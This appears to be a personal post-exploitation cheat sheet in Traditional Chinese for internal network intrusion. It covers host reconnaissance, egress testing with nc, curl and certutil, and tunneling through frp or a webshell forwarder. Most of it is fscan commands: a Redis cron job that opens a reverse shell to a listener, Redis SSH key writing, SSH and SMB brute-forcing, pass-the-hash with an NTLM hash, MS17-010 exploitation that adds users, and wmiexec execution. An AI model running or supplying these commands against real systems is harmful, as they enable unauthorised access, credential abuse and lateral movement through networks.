獲取網路配置
ipconfig /all
ifconfig
同時透過這個也可以知道是windows還是linux
獲取系統資訊
systeminfo | findstr /B /C"OS名稱 " OS 版本"
systeminfo | findstr /B /C"OSName " OS Version"
其實直接使用systeminfo感覺更靠譜,有些版本格式不一樣,查不出來。不如直接使用systeminfo。
使用工具
http://www.fuzzysecurity.com/scripts/files/wmic_info.rar
識別殺軟網站
https://i.hacking8.com/tiquan/
檢視是否出網
ICMP協議
ping www.baidu.com
tracert baidu.com
TCP/UDP
telnet 192.168.1.108 22 //TCP
nc -zv 39.101.135.232 9999 //TCP
nc -zuv 192.168.1.108 80 //UDP
HTTP/HTTPS
curl http://www.baidu.com //HTTP
curl https://www.baidu.com //HTTPS
Linux:wget、curl
Windows:certutil、powershell、bitsadmin、regsrv......
DNS
dig @8.8.8.8 www.baidu.com //DNS
nslookup www.baidu.com 8.8.8.8 //DNS
獲取許可權資訊
whoami
隧道搭建
當frp搭建不了的時候,使用webshell來進行一個搭流量轉發
https://github.com/zema1/suo5
https://github.com/fatedier/frp/releases/tag/v0.58.1
https://github.com/ehang-io/nps/blob/master/README_zh.md
內網掃描
查詢arp快取表
arp -n
arp -a
使用掃描工具
https://github.com/shmilylty/netspy
nohup netspy is &
nohup netspy is -c 10.0.0.1/8 &
https://github.com/shadow1ng/fscan
fscan.exe -h 192.168.1.1/24 -nobr -nopoc
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳過存活檢測 、不儲存檔案、跳過web poc掃描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 寫公鑰)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 計劃任務反彈shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功後,命令執行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模組ssh和埠)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (載入指定檔案的使用者名稱、密碼來進行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定掃描結果儲存路徑,預設儲存在當前路徑)
fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速檢視網段資訊 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密碼碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模組)
fscan.exe -hf ip.txt (以檔案匯入)
fscan.exe -u http://baidu.com -proxy 8080 (掃描單個url,並設定http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不進行爆破,不掃Web poc,以減少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基礎上,加入3389->rdp掃描)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支援簡單tcp功能的代理,部分功能的庫不支援設定代理)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (內建新增使用者等功能,只適用於備選工具,更推薦其他ms17010的專項利用工具)
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec無回顯命令執行)
-socks5
域資訊獲取
參考[[Cobalt Strike使用]]